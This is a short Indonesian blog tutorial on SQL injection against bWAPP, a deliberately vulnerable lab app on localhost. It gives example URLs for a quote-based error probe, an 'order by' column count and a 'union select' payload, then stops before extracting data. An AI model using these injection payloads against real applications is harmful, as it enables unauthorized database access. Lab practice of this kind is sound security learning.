Kembali lagi, kali ini gue share tutorial SQL Injection (GET/Select) ~ bWAPP
Mungkin gue akan fokus ke bWAPP kali ya, nanti gue share satu persatu :D
SQL Injection (GET/Select)
Pada kali ini vulnerability terdapat pada form select
Pada kali ini vulnerability terdapat pada URL nya, ketika kita memasukkan payload ' maka error sql syntax pun terjadi
http://localhost:8080/bwapp/sqli_2.php?movie=2'&action=go
Selanjutnya kita mencari column nya dengan cara
http://localhost:8080/bwapp/sqli_2.php?movie=2 order by 8-- -&action=go
Maka muncul
Error: Unknown column '8' in 'order clause'
Berarti menandakan bahwa column berada di nomor 8, selanjutnya kita mencari nomor ajaib nya :D
dengan cara
http://localhost:8080/bwapp/sqli_2.php?movie=.2 union select 1,2,3,4,5,6,7-- -&action=go
Maka angka ajaib yang muncul adalah nomor 2, selanjutnya kita mencari usernya
Ok sekian dulu tutorialnya :D, Next gue share sql injection lagi ya :D
Do you contact me? here > http://trolling-system.net